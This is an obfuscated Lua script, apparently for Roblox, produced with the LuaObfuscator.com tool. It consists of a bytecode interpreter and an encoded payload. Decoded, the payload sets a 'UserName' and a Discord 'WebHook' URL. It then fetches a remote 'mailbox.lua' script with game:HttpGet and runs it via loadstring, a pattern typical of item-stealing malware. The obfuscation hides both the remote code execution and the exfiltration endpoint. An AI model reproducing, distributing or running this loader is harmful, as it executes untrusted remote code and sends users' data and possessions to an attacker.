--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v71=0;while true do if (v71==0) then v19=v0(v3(v30,1,1));return "";end end else local v72=v2(v0(v30,16));if v19 then local v78=v5(v72,v19);v19=nil;return v78;else return v72;end end end);local function v20(v31,v32,v33)if v33 then local v73=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v73-(v73%(932 -(857 + 74))) ;else local v74=(570 -(367 + 201))^(v32-(928 -(214 + 113 + 600))) ;return (((v31%(v74 + v74))>=v74) and 1) or 0 ;end end local function v21()local v34=0;local v35;while true do if (v34==(878 -(282 + 595))) then return v35;end if (v34==(1637 -((2588 -(68 + 997)) + 114))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=(1271 -(226 + 1044)) -0 ;end end end local function v22()local v36=0;local v37;local v38;while true do if (v36==1) then return (v38 * (1114 -858)) + v37 ;end if (v36==(117 -((75 -43) + (157 -72)))) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + (1 -0) ;v36=958 -(892 + 65) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (353 -(64 + 23 + 263)) );v18=v18 + (184 -(67 + 113)) ;return (v42 * (12302277 + 4474939)) + (v41 * (160901 -95365)) + (v40 * 256) + v39 ;end local function v24()local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(953 -(802 + 150))) then v46=2 -(2 -1) ;v47=(v20(v45,1 -0 ,15 + 5 ) * ((999 -(915 + 82))^((353 -263) -58))) + v44 ;v43=2 + 0 ;end if (v43==2) then v48=v20(v45,(11 + 16) -6 ,31);v49=((v20(v45,1219 -((3680 -2611) + 118) )==(2 -1)) and  -(1 -0)) or (1139 -(116 + 1022)) ;v43=12 -9 ;end if (v43==0) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==((1057 -(87 + 968)) + 1)) then if (v48==(0 -0)) then if (v47==(0 + (1747 -(760 + 987)))) then return v49 * (859 -(814 + 45)) ;else local v95=791 -(368 + 423) ;while true do if (v95==(0 + 0)) then v48=3 -2 ;v46=18 -(10 + 8) ;break;end end end elseif (v48==((34660 -26786) -5827)) then return ((v47==((2355 -(1789 + 124)) -(416 + 26))) and (v49 * (1/(1423 -((1396 -(745 + 21)) + 793))))) or (v49 * NaN) ;end return v8(v49,v48-(3266 -2243) ) * (v46 + (v47/((1 + 0 + 1)^((205 -114) -39)))) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(1413 -(447 + 966))) then return "";end end v51=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;local v52={};for v67=1818 -(1703 + 114) , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v69=1500 -(1408 + 92) ;local v70;while true do if (v69==(1086 -(461 + 625))) then v70=0;while true do if (v70==0) then local v96=0;while true do if ((1289 -(993 + 295))==v96) then v70=1;break;end if (v96==0) then if (v53==(0 + 0)) then local v105=1171 -(418 + 753) ;local v106;while true do if (v105==0) then v106=0;while true do if (v106==0) then local v163=0;while true do if (v163==(0 + 0)) then v54={};v55={};v163=1;end if (v163~=(1 + 0)) then else v106=1;break;end end end if (v106==1) then v56={};v53=1 + 0 ;break;end end break;end end end if (v53==(1 + 2)) then local v107=529 -(406 + 123) ;while true do if (v107==(1769 -(1749 + 20))) then local v128=0 + 0 ;while true do if (v128==(1322 -(1249 + 73))) then for v165=1 + 0 ,v23() do v55[v165-1 ]=v28();end return v57;end end end end end v96=1;end end end if (v70==(1146 -(466 + 679))) then if (v53==1) then local v103=0;while true do if (v103==1) then v59={};v53=4 -2 ;break;end if (v103==0) then v57={v54,v55,nil,v56};v58=v23();v103=1;end end end if (v53==(1 + 1)) then local v104=0 + 0 ;while true do if (v104==(2 -1)) then for v109=1,v23() do local v110=0;local v111;local v112;local v113;while true do if ((2 -1)==v110) then v113=nil;while true do if (v111==(115 -(4 + 110))) then while true do if (v112==0) then v113=v21();if (v20(v113,585 -(57 + 527) ,1)~=0) then else local v179=0;local v180;local v181;local v182;local v183;local v184;local v185;while true do if (v179~=1) then else v182=nil;v183=nil;v179=1429 -(41 + 1386) ;end if (v179==(106 -(17 + 86))) then while true do if (1==v180) then local v187=0;while true do if (v187==0) then v183=nil;v184=nil;v187=1;end if (v187~=(1 + 0)) then else v180=3 -1 ;break;end end end if (v180~=(0 -0)) then else v181=166 -(122 + 44) ;v182=nil;v180=1 -0 ;end if ((6 -4)==v180) then v185=nil;while true do if ((0 + 0)==v181) then local v188=0 + 0 ;local v189;while true do if (v188~=0) then else v189=0 -0 ;while true do if (v189~=(66 -(30 + 35))) then else v181=1 + 0 ;break;end if (v189==0) then local v198=0;while true do if ((1258 -(1043 + 214))~=v198) then else v189=1;break;end if ((0 -0)==v198) then v182=1212 -(323 + 889) ;v183=nil;v198=2 -1 ;end end end end break;end end end if (v181~=(581 -(361 + 219))) then else v184=nil;v185=nil;v181=2;end if (v181~=(322 -(53 + 267))) then else while true do if ((1 + 0)==v182) then local v190=413 -(15 + 398) ;local v191;while true do if (v190==(982 -(18 + 964))) then v191=0 -0 ;while true do if (v191==(0 + 0)) then local v200=0 + 0 ;local v201;while true do if (v200==0) then v201=0;while true do if (v201==1) then v191=851 -(20 + 830) ;break;end if (v201==(0 + 0)) then local v204=0;while true do if (v204~=1) then else v201=1;break;end if (0~=v204) then else v185={v22(),v22(),nil,nil};if (v183==(126 -(116 + 10))) then local v206=0;local v207;local v208;while true do if (v206==1) then while true do if (v207==0) then v208=0 + 0 ;while true do if (0~=v208) then else v185[3]=v22();v185[4]=v22();break;end end break;end end break;end if (v206==0) then v207=0;v208=nil;v206=1;end end elseif (v183==(739 -(542 + 196))) then v185[3]=v23();elseif (v183==2) then v185[3]=v23() -((3 -1)^16) ;elseif (v183==(1 + 2)) then local v215=0 + 0 ;local v216;local v217;while true do if (v215==(1 + 0)) then while true do if (v216==(0 -0)) then v217=0 -0 ;while true do if (v217~=0) then else v185[1554 -(1126 + 425) ]=v23() -((407 -(118 + 287))^(62 -46)) ;v185[1125 -(118 + 1003) ]=v22();break;end end break;end end break;end if (v215==0) then v216=0;v217=nil;v215=2 -1 ;end end end v204=378 -(142 + 235) ;end end end end break;end end end if (v191==1) then v182=9 -7 ;break;end end break;end end end if (v182==(0 + 0)) then local v192=977 -(553 + 424) ;while true do if (v192~=(0 -0)) then else local v199=0;while true do if (v199~=1) then else v192=1;break;end if (v199==0) then v183=v20(v113,2 + 0 ,3 + 0 );v184=v20(v113,3 + 1 ,6);v199=1 + 0 ;end end end if (v192==1) then v182=1 + 0 ;break;end end end if (3==v182) then if (v20(v184,3,3)==1) then v185[4]=v59[v185[4]];end v54[v109]=v185;break;end if (v182==(4 -2)) then local v194=0;local v195;while true do if (v194==0) then v195=0;while true do if (v195~=(0 -0)) then else local v202=0;local v203;while true do if (v202~=(0 -0)) then else v203=0;while true do if (v203~=(1 + 0)) then else v195=4 -3 ;break;end if (v203==(753 -(239 + 514))) then local v205=0;while true do if (v205==1) then v203=1 + 0 ;break;end if (v205~=(1329 -(797 + 532))) then else if (v20(v184,1 + 0 ,1)==1) then v185[2]=v59[v185[1 + 1 ]];end if (v20(v184,4 -2 ,2)==1) then v185[1205 -(373 + 829) ]=v59[v185[734 -(476 + 255) ]];end v205=1131 -(369 + 761) ;end end end end break;end end end if (v195==(1 + 0)) then v182=5 -2 ;break;end end break;end end end end break;end end break;end end break;end if (v179==(3 -1)) then v184=nil;v185=nil;v179=3;end if (v179==(238 -(64 + 174))) then v180=0;v181=nil;v179=1 + 0 ;end end end break;end end break;end if (v111==0) then v112=0 -0 ;v113=nil;v111=1;end end break;end if (v110~=0) then else v111=0;v112=nil;v110=1;end end end v53=3;break;end if (v104~=(336 -(144 + 192))) then else for v114=217 -(42 + 174) ,v58 do local v115=0 + 0 ;local v116;local v117;local v118;while true do if (v115~=0) then else local v129=0 + 0 ;while true do if (v129==1) then v115=1 + 0 ;break;end if (v129==(1504 -(363 + 1141))) then local v167=0;while true do if (1==v167) then v129=1;break;end if (v167~=(1580 -(1183 + 397))) then else v116=0;v117=nil;v167=1;end end end end end if ((2 -1)~=v115) then else v118=nil;while true do if ((1 + 0)==v116) then if (v117==(1 + 0)) then v118=v21()~=(1975 -(1913 + 62)) ;elseif (v117==(2 + 0)) then v118=v24();elseif (v117==3) then v118=v25();end v59[v114]=v118;break;end if (v116==(0 -0)) then local v169=1933 -(565 + 1368) ;local v170;local v171;while true do if (v169~=1) then else while true do if (v170==(0 -0)) then v171=1661 -(1477 + 184) ;while true do if (v171~=1) then else v116=1 -0 ;break;end if (v171~=(0 + 0)) then else local v186=856 -(564 + 292) ;while true do if (v186~=1) then else v171=1 -0 ;break;end if (v186~=(0 -0)) then else v117=v21();v118=nil;v186=305 -(244 + 60) ;end end end end break;end end break;end if (v169==0) then v170=0 + 0 ;v171=nil;v169=477 -(41 + 435) ;end end end end break;end end end v57[1004 -(938 + 63) ]=v21();v104=1 + 0 ;end end end break;end end break;end end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==1) then if (v92<=5) then if (v92<=2) then if (v92<=0) then v89[v91[2]]=v91[3];elseif (v92>1) then v89[v91[2]]();else do return;end end elseif (v92<=3) then local v121=0;local v122;while true do if (v121==0) then v122=v91[2];v89[v122]=v89[v122](v13(v89,v122 + 1 ,v84));break;end end elseif (v92==4) then v89[v91[2]]=v62[v91[3]];elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=8) then if (v92<=6) then local v123=v91[2];local v124=v89[v91[3]];v89[v123 + 1 ]=v124;v89[v123]=v124[v91[4]];elseif (v92==7) then v62[v91[3]]=v89[v91[2]];else v83=v91[3];end elseif (v92<=10) then if (v92>9) then local v135;local v136,v137;local v138;local v139;v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v139=v91[2];v138=v89[v91[3]];v89[v139 + 1 ]=v138;v89[v139]=v138[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v139=v91[2];v136,v137=v82(v89[v139](v13(v89,v139 + 1 ,v91[3])));v84=(v137 + v139) -1 ;v135=0;for v161=v139,v84 do local v162=0;while true do if (v162==0) then v135=v135 + 1 ;v89[v161]=v136[v135];break;end end end v83=v83 + 1 ;v91=v79[v83];v139=v91[2];v89[v139]=v89[v139](v13(v89,v139 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];else local v149=0;local v150;local v151;local v152;local v153;while true do if (v149==0) then v150=v91[2];v151,v152=v82(v89[v150](v13(v89,v150 + 1 ,v91[3])));v149=1;end if (v149==1) then v84=(v152 + v150) -1 ;v153=0;v149=2;end if (v149==2) then for v175=v150,v84 do local v176=0;while true do if (v176==0) then v153=v153 + 1 ;v89[v175]=v151[v153];break;end end end break;end end end elseif (v92==11) then v89[v91[2]]=v91[3]~=0 ;else v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v83=v91[3];end v83=v83 + 1 ;break;end if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D6503073O004C752O68736B6903073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133353130343937383337343130333039312F456342527A412D69304A38416E6753557653386259475A783964572D4D4F39753464672O75633948426E5855626B6342774A5443715F56666863684F4B47594275634B3100153O00124O00013O0026053O000C000100020004083O000C0001001204000100033O00120A000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001400010026053O0001000100010004083O0001000100122O000100083O00120C000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00013O00017O00",v9(),...);
